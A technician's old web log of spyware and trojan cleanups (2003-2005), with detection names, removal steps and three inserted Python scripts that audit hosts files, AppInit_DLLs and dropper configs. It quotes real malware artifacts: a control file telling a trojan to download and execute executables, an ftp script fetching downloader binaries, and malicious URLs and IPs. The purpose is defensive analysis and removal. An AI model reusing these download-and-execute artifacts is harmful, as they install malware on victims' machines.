Spyware, worms and viruses

 03.07.05  
Some time ago (09.22.04) I got an email with the subject:
Hi, I sent you an eCard from iGreetings.com
The link in the email did not go to iGreetings.com but to 62.183.48.238
and the file downloaded was not known, so I saved it. It is 76k. (It is no longer available at that IP.)
Recently I found it is identified by Symantec as HackTool.proxy,
by Kaspersky as Backdoor.Win32.Agent.eg,
and Trend has this info: HKTL_PROXY.A
The iGreetings.com site has a message indicating that many of these emails were sent out
and that their link would have iGreetings.com in it.


In the file were some URL strings;

if you go to http://62.248.111.22/images/khazana/eudu38c38dd38d9_d882.lst

Address: 62.248.111.22 (unresolved) AS: 62.248.0.0/17 AS11042  Orion Network Systems, Inc. Rockville/Maryland Net 62/8 RIPE-C3   Amsterdam

it displays an address that is in the email header... 

Address: 155.230.159.75 (unresolved) AS: 155.230.0.0/16 AS10052  Kyungpook National Univ. Taegu/Taegu-Si Net 155.230/16 KPNU-NET   Taegu, Taegu-si @bh.knu.ac.kr

http://133.38.116.198/images/khazana/w_3d82i8sjqas823yal28s38e.asp

Address: 133.38.116.198 resolved to cdsv2.lib.saitama-u.ac.jp AS: 133.38.0.0/16 AS2907  SINET Japan Tokyo/Kanto Net 133/8 JAPAN-INET   Tokyo, Kanto

displays text - already exist

 02.08.05 

Coolwebsearch variant - 2nd removal pass - had the system cleaned down to just it three days before.
Safe mode, scan with Adaware removed 637 objects, skipped CWS and the host file

Spybot finds n-case, VX2, Huntbar

Trojan Horse Dropper.Small.8.BC - Grisoft AVG anti-virus
triggered on appwrap[1].exe in the IE cache - no other info 

CWShredder still crashes, mini removal tool found nothing.

Deleted all new dll files of 218 kb in size, 
OBE2DISP.dll and IQ32_32.DLL were in use.

set to delete on reboot with killbox - removed!

Now CWShredder works - no more files found.
Cleared the host file of the references to 69.20.16.183

removed Spyspotter - known to be bogus 
http://www.spywarewarrior.com/rogue_anti-spyware.htm

Used Spybot to immunize and add the host block list
if re-occurs, load spywareblaster ( javacool) 
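Added example (not from these notes, Spybot or any other tool named here): a small Python check that tells block-list entries in the hosts file apart from hijack entries like the 69.20.16.183 references cleared above. The hosts content inside is constructed.

```python
"""Audit a Windows hosts file for search-hijack entries (added example).

A Spybot-style block list maps ad and tracker domains to 127.0.0.1 or 0.0.0.0,
which only sinks traffic and is harmless. A hijack maps a real site (a search
engine, an update server) to a routable address, as with the 69.20.16.183
references in the notes, so the audit has to tell the two apart rather than
flag every non-default line.
"""
import ipaddress
from typing import Dict, List, Tuple

# Constructed sample: a block-list entry, a 0.0.0.0 entry, and two hijack lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       ads.example-adserver.test   # added by a block list
0.0.0.0         tracker.example.test
69.20.16.183    auto.search.msn.com
69.20.16.183    search.msn.com www.msn.com
"""

# Addresses that only sink traffic; block lists use them on purpose.
SINKHOLE = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Return (address, [hostnames]) per entry; comments and blanks are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop inline comments
        if not line:
            continue
        parts = line.split()
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line, not a hosts entry
        entries.append((parts[0], parts[1:]))
    return entries


def find_hijacks(text: str) -> Dict[str, List[str]]:
    """Map each hostname pointed at a routable (non-sinkhole) address to it."""
    hijacked: Dict[str, List[str]] = {}
    for addr, names in parse_hosts(text):
        if addr in SINKHOLE:
            continue  # block-list style entry, not a redirect
        for name in names:
            hijacked.setdefault(name, []).append(addr)
    return hijacked


def redirected_addresses(text: str) -> List[str]:
    """Distinct routable addresses that names are redirected to, sorted."""
    return sorted({a for addrs in find_hijacks(text).values() for a in addrs})


if __name__ == "__main__":
    # On a live system read %SystemRoot%\System32\drivers\etc\hosts instead.
    for name, addrs in find_hijacks(SAMPLE_HOSTS).items():
        print(f"{name} -> {', '.join(addrs)}")
```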

Full disk scan with adaware.

remove Flashenhancer BHO - XML.dll and 
Unknown file in Winsock LSP: c:\programfiles\oemji\oemjisearchplus\sfbnsp.dll 
Removed with Hijack this

Run WinsockXP - then re-entered the DNS setting.

 01.04.05 
Had a round with VX2 - Look2Me lately and some of the utilities out there did not work. Found that two or
three(?) .dll files and a file named guard were active. Every boot the .dll files change their name. Looking
in the system32 folder, find the files with the most recent timestamp. Try to copy them to verify they are in use.
Then reboot to a Windows install CD and select the recovery console option after setup starts up. Then
navigate to c:\windows\system32 or c:\winnt\system32 and dir using a wildcard *, for example dir o6*.dll,
or if it is hidden, dir /ah o6*.dll. Then rename the file using ren oldname newname.


in same system32 folder:


sdkhk32.exe - infected by Trojan-Downloader.Win32.Agent.ap - size 30kb

lncom.exe - infected by TrojanDownloader.Win32.Small.zc - size 6kb

reginv.dll - infected by Backdoor.Win32.Prorat.19.b - size 21kb

mfcyw.exe - infected by TrojanDownloader.Win32.Agent.ap - size 28kb

winsys.exe - infected by Backdoor.Win32.Prosti.c - size 48kb

in windows
sysbz32.dll - infected by Trojan-Downloader.Win32.Agent.bc 

in c:\
stcupdt.exe - infected by Trojan.Win32.SecondThought.bd 
in temp:
iinstall.exe - infected by Trojan-Downloader.Win32.IstBar.gen 

in IE.content
a.exe - backdoor.Berbew.B
B.exe - a.exe - backdoor.Coreflood

 11.11.04 
 system32\win.dll  - Backdoor.Agent.ac (Kaspersky) - Backdoor.Agent.B (Symantec)
- Win32.Mersting (CA) - Win32.Mersting will attempt to download an additional dll from a remote site.

The .DLL file, which is copied to the %System% directory with a random filename,
installs itself via the following registry entry:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs=c:\windows\system32\.dll

This means that the specified dll will be loaded by each application running within the current logon session.
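Added example (not from these notes or the vendor writeup): a Python audit of the AppInit_DLLs value just described. The parsing and checks are pure functions so they run offline; the live read uses winreg and only works on Windows.

```python
"""Audit the AppInit_DLLs value described above (added example).

AppInit_DLLs is a REG_SZ under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
holding a space- or comma-delimited list of DLL paths that user32.dll loads
into every process in the session that links user32, which is how a single
registry value keeps a DLL like win.dll resident without any Run-key entry.
The parser and checks are pure functions so they run anywhere; reading the
live value uses winreg and only works on Windows.
"""
import ntpath
from typing import Callable, Dict, List

APPINIT_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"


def parse_appinit_dlls(value: str) -> List[str]:
    """Split the REG_SZ into individual DLL paths (space or comma separated)."""
    return value.replace(",", " ").split()


def audit_appinit_dlls(value: str,
                       exists: Callable[[str], bool] = ntpath.exists) -> List[Dict[str, object]]:
    """Describe each listed DLL.

    On a workstation the value is normally empty, so every entry is worth a
    look. A bare file name (no directory) is resolved along the DLL search
    path and is the harder form to pin down; a path that no longer exists
    still has to be cleared or the value will keep pointing at it.
    """
    findings = []
    for path in parse_appinit_dlls(value):
        findings.append({
            "dll": path,
            "bare_name": ntpath.dirname(path) == "",
            "present": exists(path),
        })
    return findings


def read_live_appinit() -> str:
    """Return the live AppInit_DLLs string on Windows; '' elsewhere or if unset."""
    try:
        import winreg  # Windows only
    except ImportError:
        return ""
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, APPINIT_KEY) as key:
            value, _ = winreg.QueryValueEx(key, "AppInit_DLLs")
            return str(value)
    except OSError:
        return ""


if __name__ == "__main__":
    live = read_live_appinit()
    if not live:
        print("AppInit_DLLs is empty or unreadable here")
    for finding in audit_appinit_dlls(live):
        print(finding)
```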

 system32\hbdkkba.dll  - Trojan.Win32.StartPage.ix 
Also known as: StartPage-DU (McAfee) , Win32/StartPage.IX (Eset), Win32.Startpage.FZ (ca) 

also dropped sp.html in temp that was a search page hijack.
notepad.exe.bak and wmplayer.exe.bak were created at the same time.
when notepad.exe and wmplayer were renamed, they got replaced. 

The win.dll stayed in memory and was not visible in safe mode.
The registry key data (c:\windows\system32\win.dll) was gone in safe mode.

Removal sequence was:
removed documents and setting\user\local\temp\sp.html and windows\system32\hbakkba.dll
replaced c:\windows\notepad.exe and c:\program files\windows media player\wmplayer.exe in safe mode. 
( This was done because they got touched, scans detected no virus )
removed references to sp.html and hbakkba.dll with Hijackthis
boot to recovery console and rename win.dll
reboot and delete renamed win.dll, remove AppInit_DLLs data with regedit

 11.05.04 
Found processes navsys32 and msdoc.exe on a system that had sndmon32.exe,
smsc.exe, svchosting.exe and winmon32.exe. They are run as services. 
more soon.
 06.18.04 
I have noticed that Norton Anti-Virus 'File system realtime protection' really slows
down Adaware6 and Spybot 1.3. Right-click on the shield icon in the tray and turn it off 
when you scan.

 06.12.04 
08.20.04
http://www.computing.net/windowsxp/wwwboard/forum/110053.html
 
How to start Windows in safe mode:

Win98 or ME:
While your computer starts, press and hold the CTRL key until the 
Windows Startup menu is displayed. ( EZdrive use f8 )

Select the Safe Mode menu option from the Startup menu, and then press ENTER.

For Windows 2000:
Press the F8 key, as soon as you see the message: 
'For troubleshooting and advanced startup options for Windows 2000, press F8'. Then select safe mode.

For Windows XP:
Use the F8 key, tap it on startup until you get the Startup menu, then select safe mode.

How to view  hidden files 

 05.23.04 System was crippled with popups, I will split this out to a new page 
but for now: 

Notes from basket case - 5/19/04
Celeron700 win98 - multiple popups, multiple trojan processes

A better internet, virtual bouncer, ad destroyer, clearsearch, webhancer

fash.exe - unknown adware
mwsvm.exe
slss
mswspl
pcsvc.exe

Onh3.exe - running in temp,  infected system 03/31/04 dll dated 5/19/04
is associated with download.statblaster.com, what appears to be a control file 
contains this:
download name="SWall" downloadURL="http://download.statblaster.com/updatestats/MemoryWatcher_b.exe"
execute="true" wait="false" version="1"
download name="SWall2" downloadURL="http://download.statblaster.com/updatestats/all_files9.exe"
execute="true" wait="false" version="1"
download name="SWall3" downloadURL="http://download.statblaster.com/updatestats/tracker9.exe"
execute="true" wait="false" version="1"
download name="SWall4" downloadURL="http://download.statblaster.com/updatestats/FixIt.exe"
execute="true" wait="false" version="1"

rawu.exe - in windows app data
ssdpsrv.exe - TC Media 
o.bat file - was on desktop - infamous downloader
robaw16.exe /PC="AM.WILD" /Hideuninstall in windows\system - infected system 05/07/04
Second thought STC hit 5/13 - link was on desktop

process name r83r36t - essthunk.exe in system - Envolo - infected system 05/10/04
owercfgp - pup or Winpup32
seekseek
temporary folder in c:\
424 objects
Apropos plugin still in memory 


PC2 - Searchbar, new.net ( Napster, Kazaa had been on it )
USBMMKBD
ICSMRR.exe
BHos OFRG.dll and VERN.dll 

Below is a newsgroup hit on some of the files I found. 
Note that o.bat tries to run: 

install2.exe 
infamous_downloader.exe 
0021-bdl94126.EXE 
CS4P028.exe 

~~~pulled from newsgroup~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

run Housecall on-line scan: 

http://housecall.trendmicro.com/ 

Trend Micro detects it as: 

This malicious Java script file connects to "ftp://downloads.deult-homepage-network.com" 
and attempts to download the following files: 

Silent.exe – detected by TREND MICRO as TROJ_STILEN.A 
Bs5-nt15v.exe – detected as ADW_BKDSPACE.A 
Cs4p028.exe – detected as TROJ_SMALL.GO 
0021-bd194126.exe – detected as TROJ_REVOP.A 
It also drops the following files on the infected system: 

O 
O.BAT - Batch file component of the malware. TREND MICRO detects this file as BAT_DEBESKI.B 

~~~end newsgroup~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This link describes the O.BAT as slightly different than what I found:
Trend Micro on JS_DEBESKI.B

The O file is an ftp script:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get install2.exe
get infamous_downloader.exe
get 0021-bdl94126.EXE
get CS4P028.exe
bye
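Added example (not from these notes or from any of the tools named here): a Python parser for the two dropper artifacts quoted above, the statblaster control file and the O ftp script, so the files a sample would fetch can be listed without running it. The samples inside are copied from the notes, trimmed to two records each.

```python
"""Pull the download targets out of the two dropper artifacts above (added example).

Parses the statblaster control file (download name=... downloadURL=...
execute=... wait=... version=...) and the 'O' script that o.bat feeds to
ftp.exe (open host / user / password / bin / get ... / bye).
"""
import re
from typing import Dict, List, Optional

# Copied from the notes above, trimmed to two of the four records.
CONTROL_FILE = """\
download name="SWall" downloadURL="http://download.statblaster.com/updatestats/MemoryWatcher_b.exe"
execute="true" wait="false" version="1"
download name="SWall2" downloadURL="http://download.statblaster.com/updatestats/all_files9.exe"
execute="true" wait="false" version="1"
"""

# Copied from the notes above, trimmed to two of the four get lines.
FTP_SCRIPT = """\
open downloads.default-homepage-network.com
tmpacct
12345
bin
get install2.exe
get infamous_downloader.exe
bye
"""

ATTR = re.compile(r'(\w+)="([^"]*)"')


def parse_control_file(text: str) -> List[Dict[str, str]]:
    """Return one dict of attributes per record.

    Records span line breaks, so a new record starts at each 'name' attribute
    rather than at each line.
    """
    records: List[Dict[str, str]] = []
    for key, val in ATTR.findall(text):
        if key == "name" or not records:
            records.append({})
        records[-1][key] = val
    return records


def executed_urls(text: str) -> List[str]:
    """URLs whose record has execute="true", i.e. fetched and run immediately."""
    return [r["downloadURL"] for r in parse_control_file(text)
            if r.get("execute", "").lower() == "true" and "downloadURL" in r]


def parse_ftp_script(text: str) -> Dict[str, object]:
    """Interpret an ftp.exe -s: script: host, credentials, transfer mode, files.

    ftp.exe answers its User: and Password: prompts with the two lines that
    follow 'open', which is why they carry no command keyword.
    """
    host: Optional[str] = None
    creds: List[str] = []
    mode = "ascii"
    files: List[str] = []
    expect_creds = 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if expect_creds:
            creds.append(line)
            expect_creds -= 1
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.lower()
        if cmd == "open":
            host, expect_creds = arg.strip(), 2
        elif cmd in ("bin", "binary"):
            mode = "binary"
        elif cmd == "get":
            files.append(arg.strip())
        elif cmd in ("bye", "quit"):
            break
    return {"host": host, "user": creds[0] if creds else None,
            "password": creds[1] if len(creds) > 1 else None,
            "mode": mode, "files": files}


if __name__ == "__main__":
    print(executed_urls(CONTROL_FILE))
    print(parse_ftp_script(FTP_SCRIPT))
```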
...........................................
robert's description - he went to the ftp site
Bugtraq: RE: Still Vulnerable in MSIE
From: Thor Larholm - reference to default-homepage-network.com  

Mail Wiper and their "Marketing" techniques - More on default-homepage-network.com

I ran Kaspersky scans on some of the collected files; the Ad-aware6 id is included where it had one.
  
Scanned file:   essthunk.exe - infected 05/10/04
Ad-aware6 id: PeopleOnPage
 
essthunk.exe - infected by TrojanDownloader.Win32.Apropo.d 

Scanned file:   OWERCFGP.exe
Ad-aware6 id: Winpup32
 
OWERCFGP.exe - infected by TrojanDownloader.Win32.VB.ca 
 
Scanned file:   CS4P028.exe
 
CS4P028.exe - infected by TrojanDownloader.Win32.Small.go 
Ad-aware6 id:  ClearSearch
 
Scanned file:   infamous_downloader.exe
 
infamous_downloader.exe - packed with UPX
infamous_downloader.exe - infected by TrojanDownloader.Win32.Small.iq 
 
Scanned file:   id53.exe
 
id53.exe - packed with UPX
id53.exe - infected by Trojan.Win32.SecondThought.l  - found in folder named 'installer'

Scanned file:   install2.exe - infected system 5/13/04 - also found on same PC

install2.exe - packed with UPX
install2.exe - infected by Trojan.Win32.SecondThought.l 
 
Scanned file:   edow.exe - infected system 04/06/04
 
edow.exe - infected by TrojanDownloader.Win32.QDown.b 

Scanned file:   0021-bdl94126.EXE - infected system 5/13/04
Ad-aware6 id: VX2.BetterInternet


0021-bdl94126.EXE - archived by WiseSFX
0021-bdl94126.EXE/WISE0000.BIN - OK
0021-bdl94126.EXE/WISE0001.BIN - OK
0021-bdl94126.EXE/WISE0002.BIN - OK
0021-bdl94126.EXE/WISE0003.BIN - OK
0021-bdl94126.EXE/WISE0004.BIN - OK
0021-bdl94126.EXE/WISE0005.BIN - OK
0021-bdl94126.EXE/WISE0006.BIN - OK
0021-bdl94126.EXE/WISE0007.BIN - infected by TrojanDownloader.Win32.VB.ca 
0021-bdl94126.EXE/WISE0008.BIN - packed with UPX
0021-bdl94126.EXE/WISE0008.BIN - infected by Trojan.Win32.Revop.c 
 

Scanned file:   sys_ai_client_loader.exe - infected system 02/25/04
 
sys_ai_client_loader.exe - infected by Trojan.Win32.SecondThought.h 
Ad-aware6 id:  PeopleOnPage   
   
Scanned file:   Overpro323.exe - infected system 4/20/04 
 
Overpro323.exe - archived by NSIS
Overpro323.exe/data0001 - OK
Overpro323.exe/data0002 - OK
Overpro323.exe/data0003 - OK
Overpro323.exe/data0004 - OK
Overpro323.exe/data0005 - infected by TrojanDownloader.Win32.Agent.ac 
Overpro323.exe/data0006 - infected by TrojanDownloader.Win32.Turown.h 
Overpro323.exe/data0007 - OK
Overpro323.exe/data0008 - infected by TrojanDownloader.Win32.Turown.g 
Overpro323.exe/data0009 - OK
Overpro323.exe/data0010 - OK
Overpro323.exe/data0011 - OK
Overpro323.exe/data0012 - infected by TrojanDownloader.Win32.VB.cw 
Overpro323.exe/data0013 - OK
Overpro323.exe/data0014 - OK
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In folder STC

Scanned file:   Tvm_b5_269.exe
 
Tvm_b5_269.exe - infected by TrojanDropper.Win32.Small.gj 

NAV identified this as trojan.dropper

Scanned file:   April0604_loader.exe
 
April0604_loader.exe - infected by Trojan.Win32.SecondThought.h 
 
Scanned file:   VT02.exe
 
VT02.exe - packed with ASPack
VT02.exe - infected by Trojan.Win32.Delf.cf 
Ad-aware6 id: Win32.Delf.Trojan.A Object recognized

Scanned file:   bdl14108.exe
 
bdl14108.exe - packed with UPX
bdl14108.exe - infected by Trojan.Win32.Revop.c 
 
Scanned file:   slmss.exe
 
slmss.exe - packed with UPX
slmss.exe - infected by Trojan.Win32.SecondThought.a 
Ad-aware6 id: AdRotator
 
Scanned file:   ClrSchP070.exe
 
ClrSchP070.exe - infected by Backdoor.Ruledor.c 
Ad-aware6 id: ClearSearch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ad-aware6 scan of collected sample files Using reference-file :01R317 12.06.2004

VX2.BetterInternet Object recognized!
    Type               : File
    Data               : 0021-bdl94126.exe

 ClearSearch Object recognized!
    Type               : File
    Data               : cs4p028.exe
 
 Virtumundo Object recognized!
    Type               : File
    Data               : cidrules.dll

 PeopleOnPage Object recognized!
    Type               : File
    Data               : sys_ai_client_loader.exe
   
 Virtumundo Object recognized!
    Type               : File
    Data               : wincore.dll

 Virtumundo Object recognized!
    Type               : File
    Data               : winupd.dll

Win32.Delf.Trojan.A Object recognized!
    Type               : File
    Data               : vt02.exe
    FileSize           : 201 KB

   
 ClearSearch Object recognized!
    Type               : File
    Data               : clrschp070.exe

 SecondThought Object recognized!
    Type               : File
    Data               : stc.exe
   
 VX2.BetterInternet Object recognized!
    Type               : File
    Data               : bdl14108.exe

 AdRotator Object recognized!
    Type               : File
    Data               : slmss.exe
   
 Other Object recognized!
    Type               : File
    Data               : ofrg.dll

    OriginalFilename   : Favorite.DLL
    
 SecondThought Object recognized!
    Type               : File
    Data               : id53.exe
    
    OriginalFilename   : spawner.exe
   
 Winpup32 Object recognized!
    Type               : File
    Data               : owercfgp.exe
    CompanyName        : totempole 
    InternalName       : pup 
    OriginalFilename   : pup.exe 
    ProductName        : werule 

 PeopleOnPage Object recognized!
    Type               : File
    Data               : essthunk.exe
    


05.10.04 Found processes MWSVM.EXE and Slmss.exe running on a system that has several other problems.
Identified by Pest Patrol as DefaultSearch.SeekSeek, it is a BHO. iic4.exe showed up in temp; it is an Adgoblin,
a popup ad server BHO for IE. Also Soa8O.exe was infected with Backdoor.VB.nb
and NuzK63G.exe infected with Backdoor.VB.oq. These can rename themselves and reinsert into run startup.

03.08.04  Recent viruses I have found on systems include the Manifest trojan; it was
on a system that had Kazaa installed.
Sophos - Troj/Manifest-A
NAI - ManifestDest
Symantec - W32.Manifest.Trojan
A review of the actual product ??? PCMag - Brett Glass
Another one I found is identified as Backdoor.Afcore.ab by Kaspersky,
but I can't find any info on it. F-Secure has related info but the dll is not the same size and the text string inside is
different. There is some evidence that this can hide in an NTFS stream. I also found a log with the same name
as the dll; it indicates that application and website activity are tracked.

fsecure on: rundll32  C:\Windows\system32:qgtoxoi.dll,Uninstall 

03.05.04  Found a dll nfzaxgnh.dll - that was IEloader Module - part of a BHO - a writeup of this 
and some others that create random names from sysinfo.org is here: BHO information

02.14.04  Compared Adaware6.181 with PestPatrol 4.3.0.8, test was the temp folder from a problem PC.
Adaware found Hotbar, VX2 BetterInternet and IBIS Toolbar, Pest Patrol found EAnthology (SS_UNI~.EXE)
01.23.04  Revisit to last month: I collected a suspicious file with the name of 'null'
from c:\. The file contains the string: dst.trafficsyndicate.com/Dnl/T_50047/btiein.cab
which turns out to be known as HuntBar, a search-hijacker - details from and.doxdesk.com
Adaware only saw the registry entries for this (on 12.16.03).
01.20.04
A HijackThis tutorial by Merijn
Been finding lots of new stuff and repeats of old; Gator is now called Claria.
Found msnarrator.exe and mpgcom.dll on a system on 12.31.03, Symantec called it Trojan.Narat.
They have since reclassified it as Spyware adware.mpgcom. It was in the anti-virus definitions
but they took it out. It can be saved by System Restore, so it could come back!
On the same system was found start.exe, a browser hijacker - write-up by Pest Patrol
Also runit.exe, a dialer, here is the writeup by Sophos

I have seen the "Viewpoint media player" on several systems, it often has
a "remove only" entry in the installed programs list. Today I found vmpremov.exe
in a temp folder that is signed "Viewpoint Media Player MtsAxInstaller"... I now know that
it is left in the temp folder when Viewpoint is removed.

I have looked at Viewpoint, the webpage is here Viewpoint
The 3d effect from outside the window is interesting. The program has total write
access to its program folders. Many files are updated and a cache of the viewed animations
is created. MTSDownloadSites.txt indicates it is used all through AOL, other names were 
[Adobe][CompuServe][CompuServePublic][NSBeta][NS322][Beta][MSNPromo]

snips from Spyware info forum thread on Viewpoint 
~~~~~~~~~~
Viewpoint is a flash-like plugin that displays 3d graphics and other sorts of enhanced advertising. 
~~~~~~~~~~
For example, look at this Viewpoint demo: http://www.viewpoint.com/online_ad/demos/nestea/index.html
(only works if you have the player installed)
AT&T incorporates it so that you can view their phones in 3D animation while shopping/browsing their webstore. 
It's also used by AIM and AOL v8.0 / v9.0 for their advance chat icon features (which animate in 3D). 
~~~~~~~~~~ 
                    
10.24.03 
I cleaned a badly infected XP laptop. Following is info on the things I found.
The whole thing started with a Grokster install on 08.27.03, things got bad 
on 10.22.03 and then it was brought to me due to Internet Explorer problems.
I found that it had been redirected for search functions in several ways, had a number of
added toolbars, and a whole slew of monitoring and tracking spyware was loaded.

doxdesk writeup on PeopleOnPage
It ran in the background and was self updating.
doxdesk writeup on ShopAtHomeSelect
ShopAtHomeSelect runs in the background via Isp.dll in the windows\system32 folder; it seems to block
Norton Anti-virus LiveUpdate. When I got rid of it (in Safe mode) LiveUpdate started running.
doxdesk writeup on TOPicks
doxdesk writeup on ShopNav

The following were not directly connected to the Grokster install.

doxdesk writeup on DownloadWare
doxdesk writeup on BookedSpace
loaded in registry startup, has bsx5.dll and bs3.dll, 
BookedSpace/BS2 is silently installed by FreeWire's FreeMP3Player
doxdesk writeup on n-Case by 180solutions.com
May be installed by BookedSpace, 180solutions is also known as Riviera Gold Casino

Look2Me.com is site that seems to be for rating pictures, has other freebies, but...
see what Symantec says
a related one, SimilarSingles.com, plants a file in \system32\ named 
msg{5E23A031-574F-489C-9482-9E2730FD559B}0111.dll  It's run during startup by InprocServer32
this file is listed by Symantec in the writeup for Look2Me.com
 
Pestpatrol writeup on Bargain Buddy
Seems to have come with favoriteman  
cexx.org on Cydoor
an ad cache, appears to be benign adware at this point.
Symantec on eBates  
adware, collects info, delivers Moemoney
eAccelleration
FileFreedom
IGetNet 
IPinsight
My Search, Myway.Mybar
Vx2/e - favoriteman
Webhancer
Network Essentials.sc bar

YoSponge's ip block list
an ip I found in the host file was identified as auto.search.msn.com but is associated with ShopNav.

10.06.03
winactive.exe - component of lop.com,
bviestrt.exe - ???
TRICKL~1.EXE - seems to be associated with gator
qanizjcj.exe - contains string 'Swizz03r Download Agent' turned up one reference in a  News group 


09.03 
spywareinfo.com article on Lop.com 

Spyware found on kids computer

04.11.03 I used Spybot Search & Destroy to get 'em and provide some descriptions. I got more info from Adaware6 and www.doxdesk.com. I added the Notes. At the bottom of the page are some snips from news groups. Note: this kid likes neopets.com and related seemingly harmless sites, but many adults would go to twistedhumor.com so... they got this stuff also!

IPinsight

Description: Uses information collected from you to improve their database. The function of this database is not completely clear, but they will use it to track your location down to your neighbourhood, including geolocated demographic statistics about you.
Note: Sentry.exe and ipinsigt.dll are part of the install.
Privacy Statement: IPinsight Software generates Line Speed, Geography, Gender/Age estimates, User ID, and IP address, which it transmits to the IPinsight servers for use in the preparation of the company's data file products. ... Unique Identifier: IPinsight maintains file integrity through the use of a unique random number (GUID) for each user, which is stored in the user's Windows Registry. ... IP Address: Finally, when you install IPinsight's Software, it collects several bits of information about the configuration of your computer. This information includes information about the computer's hardware configuration, such as the amount of free space on your hard drive, and information about the computer's software configuration, such as the name and version of the operating system.

Whenu.com's Savenow

Functionality: SaveNow wants to help people in the US with shopping. It wants to give you additional (advertisement) information whenever you surf, e.g. use a search engine.
Description: Hiding data by misusing a structure in the registry reserved for other stuff doesn't help you trust a software.
Note: Wusn.1 key found in registry, save.exe is found on disk. Weathercast is associated with savenow in that it gets installed also.
Privacy Statement: The Internet is an evolving medium and WhenU.com may change its privacy policy from time to time. Please review the WhenU.com privacy policy often. Use of any WhenU.com product indicates your knowledge and acceptance of the privacy policy posted on the WhenU.com site and toolbar at that time.

Gigatech Superbar

Functionality: Fills in names, passwords and form data. Enhanced search functions for IE.
Description: Installs unrequested and without informing the user, for example with the last TwistedHumor comic. Why an account/password/form filling utility? It has long ago been integrated into IE.
Note: seems to cause page not found errors
Privacy Statement: Non-existent

Igetnet

Functionality: New search functions for IE
Description: No privacy violation (except keywords are stored in combination with your IP), but installation removes all other installed BHOs. In addition, it hijacks the MS search pages to their own homepage.
Note: winstart001.exe is part of install, may cause 'page not found' errors.
and.doxdesk.com info on Igetnet

Favoriteman - detected by Adaware but not Spybot S&D

Description: FavoriteMan is an IE Browser Helper Object, it can install other spyware. mbr32.dll can be found in windows\system
Note: gig.dll is a renamed version of F1.dll - a known component of Favoriteman
and.doxdesk.com info on Favoriteman

n-case

Functionality: Provides ads.
Privacy Statement: When you register with one of 180Solutions' distribution partners, you may be asked to provide personal information about yourself and your interests. In some cases, non-personally identifiable information about you may be passed to us by the partner. This may include, but is not limited to, your age, sex, geographic region and interests. [...] When n-CASE is actively running on your computer, the software generates logs of your surfing activity, including web pages you have visited and the order in which you visited these pages. These logs are then uploaded to 180Solutions' secure servers. We use these logs for market research purposes and to provide you with offers and content specifically targeted to your interests and habits. 180Solutions stores these logs on our servers, for our use.
Note: msbb.exe is part of the n-case install. Stability problems are often introduced by adware, so much by this program that it got its own Microsoft Knowledge Base Article - Error Message: "Msbb.exe has encountered a problem and needs to close..." msbb.exe was attributed to web3000, then 180solutions, and is now identified by Adaware 6 as being the twistedhumor.com 'rich black cartoon'. http://cexx.org/ claims the wsock32.dll file is over-written by msbb.exe

Other people have noticed the spyware

Newsgroups: alt.privacy.spyware
Subject: Re: TwistedHumor and new spyware
On Mon, 30 Dec 2002 04:56:57 GMT, mtubi@python.net (sponge) wrote:
>As a part of my ongoing research, I downloaded and installed
>TwistedHumor's latest cartoon. Talk about spyware! Only KaZaa can top
>this! I counted SEVEN different immediately-identifiable types:
>BargainBuddy, Aornum, IGetNet, IPInsight, SuperBari Installer, WhenU's
>SaveNow, EBates (TopMoxie mod). A few of these are apparently
>previously unidentified, and TwistedHumor does not tell you about all
>of them. The good thing is I got a lot of great data for the Spyware
>Blocklist! Found some new advertisers their spyware talks to as well.

post by James Sullivan in Win98.gen.discussion, 19 October:
wnad.exe = Spyware! http://twistedhumor.com/
My guess is that you installed Yo Mama Osama using 'Osama.exe' from twistedhumor.com
Our 'friends' at twisted humor add this little bit of spyware that doesn't unload when you uninstall 'yo mama osama'. It seems to pop ads up in the background without the need for a browser. Nice huh. This WNAD.EXE program is placed in startup. It is located in the Windows directory and has the following other files: wnad.dat, wnad.exe, wnad-update.exe, wnad.lgc
Look here for information about wnad.exe and removal instructions: http://www.cexx.org/osama.htm

Links:
Article on Adware
Spywareinfo on CoolWebSearch
myNetWatchman on Windows PopUP SPAM
Note that grc.com addresses this issue as well
The Official Proxomitron Forum - Hosts file
Hijack This - by Merijn
Spywareinfo.com
Eric Howes' Privacy & Security Page
Cexx.org on NewdotNet
Winpatrol
Trend Micro on JS_DEBESKI.A